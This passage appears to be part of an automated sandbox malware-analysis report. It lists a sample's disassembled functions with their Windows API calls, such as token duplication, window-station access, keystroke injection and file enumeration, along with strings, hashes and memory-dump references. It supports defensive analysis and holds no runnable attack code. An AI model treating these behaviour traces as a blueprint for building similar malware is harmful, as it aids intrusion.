                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 0f8e87b8ab2299ea487051b0b5086a159bc90f10ccf729fd88924486b589b63d
                                                                    • Instruction ID: e38b6ea64af4bc267306c7bc008bf28744d11dc9cb8b9ab2436b1ce2ad52d7ce
                                                                    • Opcode Fuzzy Hash: 0f8e87b8ab2299ea487051b0b5086a159bc90f10ccf729fd88924486b589b63d
                                                                    • Instruction Fuzzy Hash: 35F01C71501711DFCB349F64D494812B7E2BF14335318896EE2D682710C776A840EB40
                                                                    APIs
                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FF07B0
                                                                      • Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: LongNamePath_memmove
                                                                    • String ID:
                                                                    • API String ID: 2514874351-0
                                                                    • Opcode ID: e12b5f801011d1cead23d71057e0f372f75a47cb83042841e421ee0af191b514
                                                                    • Instruction ID: b6b658512db3a0eaf43509d971d27a579c7d901ec2568a935423a8e5f45315c7
                                                                    • Opcode Fuzzy Hash: e12b5f801011d1cead23d71057e0f372f75a47cb83042841e421ee0af191b514
                                                                    • Instruction Fuzzy Hash: F2E0867690422957C721A5689C05FEA77DDDBC86A0F0441B6FD4CD7248D9659C808690
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock
                                                                    • String ID:
                                                                    • API String ID: 2638373210-0
                                                                    • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                    • Instruction ID: 9ce9ad7dfa3a84a66e62a45ccc5d1deb4cc6ac72920d7388cb034aba32f04b60
                                                                    • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                    • Instruction Fuzzy Hash: 93E092B0104B045FD7398A28D800BA377E5AB05305F04099DF2EA83242EB6278458759
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 01581A63
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063593989.0000000001581000.00000040.00000020.00020000.00000000.sdmp, Offset: 01581000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1581000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                    • Instruction ID: e8f48401111c0767818ee1cac5714d65840ab78bb3ec9d911671def70fec7fb7
                                                                    • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                    • Instruction Fuzzy Hash: 20E08C30905608EFDB10EBA8C945AEDB3E8BB04320F004A55A916EB280D9708A41D7D4
                                                                    APIs
                                                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0100DD42,?,?,00000000), ref: 00FD5C5F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: 4c8365c541e7b0491706245211d2ccf970f10eb3092f4c5ad012340c400beb8f
                                                                    • Instruction ID: 3f31dfa92b313044c9bb084c1094fc3ada01e7a2220f9a7a3787fd119fcb93b7
                                                                    • Opcode Fuzzy Hash: 4c8365c541e7b0491706245211d2ccf970f10eb3092f4c5ad012340c400beb8f
                                                                    • Instruction Fuzzy Hash: C3D0C77464030CBFE710DB80DC46FAA777CD705710F100194FD0497290D6B27D508795
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 01581A33
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063593989.0000000001581000.00000040.00000020.00020000.00000000.sdmp, Offset: 01581000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1581000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                    • Instruction ID: 1a7ac1cf101752545dc89cc27e19db3e7ebbb92d6182908843f4acf929106f28
                                                                    • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                    • Instruction Fuzzy Hash: A4D05E3090520CABCB10DAA8D90499DB3E8AB05320F004754E91597281D5719A409790
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __wfsopen
                                                                    • String ID:
                                                                    • API String ID: 197181222-0
                                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                    • Instruction ID: f90413dfbd64c80c5f5f0d197ff2bd5c3e8347fb515e7ee6ccc792dff290d58a
                                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                    • Instruction Fuzzy Hash: 01B0927644020C77CE012A82FC02A593F199B42B64F408020FB0C18172E677A664AA89
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000002,00000000), ref: 0103D1FF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1452528299-0
                                                                    • Opcode ID: 7a7a6939303112474378c1232a81ab8490e35a452c9f19180309bca8f3f979b9
                                                                    • Instruction ID: 5f69354724e86f4b4cfd3888c702bb8baf72e69429fb17242c44ed5d01005658
                                                                    • Opcode Fuzzy Hash: 7a7a6939303112474378c1232a81ab8490e35a452c9f19180309bca8f3f979b9
                                                                    • Instruction Fuzzy Hash: 207195306083018FD704EF68C891A6EB7E5BF95710F48496DF9968B3A2DB34E909DB52
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000001F4), ref: 01583469
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063593989.0000000001581000.00000040.00000020.00020000.00000000.sdmp, Offset: 01581000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1581000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                    • Instruction ID: 2c302bdbe7f6064eb214d6b2693a4d3a902d12f9f9aaa895a613a09f0026d8ed
                                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                    • Instruction Fuzzy Hash: 4EE09A7494010DAFDB00EFA8D54969D7BB4FF04701F1046A5FD05A6691DA309A548A62
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000001F4), ref: 01583469
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063593989.0000000001581000.00000040.00000020.00020000.00000000.sdmp, Offset: 01581000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1581000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction ID: 84c7a7de3d671a5d79eba06f2a17c6df9e57dee21d8e2ed76ff48e4971fc051d
                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction Fuzzy Hash: 97E0E67494010DDFDB00EFB8D54D69D7BB4FF04701F104265FD01E2381D6309D508A62
                                                                    APIs
                                                                      • Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623
                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0105CB37
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0105CB95
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0105CBD6
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0105CC00
                                                                    • SendMessageW.USER32 ref: 0105CC29
                                                                    • _wcsncpy.LIBCMT ref: 0105CC95
                                                                    • GetKeyState.USER32(00000011), ref: 0105CCB6
                                                                    • GetKeyState.USER32(00000009), ref: 0105CCC3
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0105CCD9
                                                                    • GetKeyState.USER32(00000010), ref: 0105CCE3
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0105CD0C
                                                                    • SendMessageW.USER32 ref: 0105CD33
                                                                    • SendMessageW.USER32(?,00001030,?,0105B348), ref: 0105CE37
                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0105CE4D
                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0105CE60
                                                                    • SetCapture.USER32(?), ref: 0105CE69
                                                                    • ClientToScreen.USER32(?,?), ref: 0105CECE
                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0105CEDB
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0105CEF5
                                                                    • ReleaseCapture.USER32 ref: 0105CF00
                                                                    • GetCursorPos.USER32(?), ref: 0105CF3A
                                                                    • ScreenToClient.USER32(?,?), ref: 0105CF47
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0105CFA3
                                                                    • SendMessageW.USER32 ref: 0105CFD1
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0105D00E
                                                                    • SendMessageW.USER32 ref: 0105D03D
                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0105D05E
                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0105D06D
                                                                    • GetCursorPos.USER32(?), ref: 0105D08D
                                                                    • ScreenToClient.USER32(?,?), ref: 0105D09A
                                                                    • GetParent.USER32(?), ref: 0105D0BA
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0105D123
                                                                    • SendMessageW.USER32 ref: 0105D154
                                                                    • ClientToScreen.USER32(?,?), ref: 0105D1B2
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0105D1E2
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0105D20C
                                                                    • SendMessageW.USER32 ref: 0105D22F
                                                                    • ClientToScreen.USER32(?,?), ref: 0105D281
                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0105D2B5
                                                                      • Part of subcall function 00FD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FD25EC
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0105D351
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                    • String ID: @GUI_DRAGID$F
                                                                    • API String ID: 3977979337-4164748364
                                                                    • Opcode ID: e33a48190e689529ab204eded5e336fde4eb93f1830cb674ef91f2c1fa5499a7
                                                                    • Instruction ID: df56c47a1e80ad3d60ec41fc8919b6f65fefda8e14a3bd7ae1ee5a31adca51be
                                                                    • Opcode Fuzzy Hash: e33a48190e689529ab204eded5e336fde4eb93f1830cb674ef91f2c1fa5499a7
                                                                    • Instruction Fuzzy Hash: B742BF38104341AFEBA1CF29C944AABBFE9FF48350F04055AFAD5972A5C736D840EB91
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$_memset
                                                                    • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                    • API String ID: 1357608183-1798697756
                                                                    • Opcode ID: 5e3d9d375217f3e9d70c9dd70b02bd1afc846ad0307246a63876d011590cff52
                                                                    • Instruction ID: 746fe1334fde343f2225aebdba3e38ab5c93cacc9a851195b5c8f259b06cdd65
                                                                    • Opcode Fuzzy Hash: 5e3d9d375217f3e9d70c9dd70b02bd1afc846ad0307246a63876d011590cff52
                                                                    • Instruction Fuzzy Hash: FF93A575E04325DBDB24DF98C881BADB7F1FF48310F2581AAE985EB281E7749981DB40
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(00000000,?), ref: 00FD48DF
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0100D665
                                                                    • IsIconic.USER32(?), ref: 0100D66E
                                                                    • ShowWindow.USER32(?,00000009), ref: 0100D67B
                                                                    • SetForegroundWindow.USER32(?), ref: 0100D685
                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0100D69B
                                                                    • GetCurrentThreadId.KERNEL32 ref: 0100D6A2
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0100D6AE
                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0100D6BF
                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0100D6C7
                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 0100D6CF
                                                                    • SetForegroundWindow.USER32(?), ref: 0100D6D2
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0100D6E7
                                                                    • keybd_event.USER32(00000012,00000000), ref: 0100D6F2
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0100D6FC
                                                                    • keybd_event.USER32(00000012,00000000), ref: 0100D701
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0100D70A
                                                                    • keybd_event.USER32(00000012,00000000), ref: 0100D70F
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0100D719
                                                                    • keybd_event.USER32(00000012,00000000), ref: 0100D71E
                                                                    • SetForegroundWindow.USER32(?), ref: 0100D721
                                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 0100D748
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 4125248594-2988720461
                                                                    • Opcode ID: c348a2336ba2ec4383f50df3f63ac27eee3d8800d5a63a7c02fbe9e91e08f585
                                                                    • Instruction ID: 809ecc09d548e7720cdef27339236a66b7e6e3e3f425693372274697a57d592a
                                                                    • Opcode Fuzzy Hash: c348a2336ba2ec4383f50df3f63ac27eee3d8800d5a63a7c02fbe9e91e08f585
                                                                    • Instruction Fuzzy Hash: 3E318071A40318BBFB312BA19C49F7F3E6CEB48B50F104055FB44EA1C1D6B95900ABB0
                                                                    APIs
                                                                      • Part of subcall function 010287E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0102882B
                                                                      • Part of subcall function 010287E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01028858
                                                                      • Part of subcall function 010287E1: GetLastError.KERNEL32 ref: 01028865
                                                                    • _memset.LIBCMT ref: 01028353
                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 010283A5
                                                                    • CloseHandle.KERNEL32(?), ref: 010283B6
                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 010283CD
                                                                    • GetProcessWindowStation.USER32 ref: 010283E6
                                                                    • SetProcessWindowStation.USER32(00000000), ref: 010283F0
                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0102840A
                                                                      • Part of subcall function 010281CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01028309), ref: 010281E0
                                                                      • Part of subcall function 010281CB: CloseHandle.KERNEL32(?,?,01028309), ref: 010281F2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                    • String ID: $default$winsta0
                                                                    • API String ID: 2063423040-1027155976
                                                                    • Opcode ID: dcd6d40d7ad33c1f145e57e246b27e8165b4bb0f1a72960c22387916877c21f3
                                                                    • Instruction ID: a228f5214919f59d2d427a592ed0ef1d29533f1a04f5b9865d72db049e6cfde0
                                                                    • Opcode Fuzzy Hash: dcd6d40d7ad33c1f145e57e246b27e8165b4bb0f1a72960c22387916877c21f3
                                                                    • Instruction Fuzzy Hash: 9A81707590022DAFEF51DFA4CC44AEE7BF8FF08304F14819AFA90A6164D7398A54DB20
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0103C78D
                                                                    • FindClose.KERNEL32(00000000), ref: 0103C7E1
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0103C806
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0103C81D
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0103C844
                                                                    • __swprintf.LIBCMT ref: 0103C890
                                                                    • __swprintf.LIBCMT ref: 0103C8D3
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                    • __swprintf.LIBCMT ref: 0103C927
                                                                      • Part of subcall function 00FF3698: __woutput_l.LIBCMT ref: 00FF36F1
                                                                    • __swprintf.LIBCMT ref: 0103C975
                                                                      • Part of subcall function 00FF3698: __flsbuf.LIBCMT ref: 00FF3713
                                                                      • Part of subcall function 00FF3698: __flsbuf.LIBCMT ref: 00FF372B
                                                                    • __swprintf.LIBCMT ref: 0103C9C4
                                                                    • __swprintf.LIBCMT ref: 0103CA13
                                                                    • __swprintf.LIBCMT ref: 0103CA62
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                    • API String ID: 3953360268-2428617273
                                                                    • Opcode ID: 712613429bfbe70be35d69b7981450b3cdd309d5230c2aabfa6cbbbadb302baf
                                                                    • Instruction ID: 6685b1453d26079be1cf1e76a8bc59e5b6e6106ff4b2709e8de617891672e95d
                                                                    • Opcode Fuzzy Hash: 712613429bfbe70be35d69b7981450b3cdd309d5230c2aabfa6cbbbadb302baf
                                                                    • Instruction Fuzzy Hash: 7BA14BB2408345ABD710EFA4CC85DAFB7EDFF84704F44091AF585C6291EA79DA08DB62
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0103EFB6
                                                                    • _wcscmp.LIBCMT ref: 0103EFCB
                                                                    • _wcscmp.LIBCMT ref: 0103EFE2
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0103EFF4
                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 0103F00E
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0103F026
                                                                    • FindClose.KERNEL32(00000000), ref: 0103F031
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0103F04D
                                                                    • _wcscmp.LIBCMT ref: 0103F074
                                                                    • _wcscmp.LIBCMT ref: 0103F08B
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0103F09D
                                                                    • SetCurrentDirectoryW.KERNEL32(01088920), ref: 0103F0BB
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0103F0C5
                                                                    • FindClose.KERNEL32(00000000), ref: 0103F0D2
                                                                    • FindClose.KERNEL32(00000000), ref: 0103F0E4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                    • String ID: *.*
                                                                    • API String ID: 1803514871-438819550
                                                                    • Opcode ID: cecfbca9a07084417c6aa01e47b48410ebe4af8b11a6fdb5be746ae19ea142f1
                                                                    • Instruction ID: b9a554848958964e2a90d099c73aedb90b71b57be661ddb4e8290dcfd004e3c8
                                                                    • Opcode Fuzzy Hash: cecfbca9a07084417c6aa01e47b48410ebe4af8b11a6fdb5be746ae19ea142f1
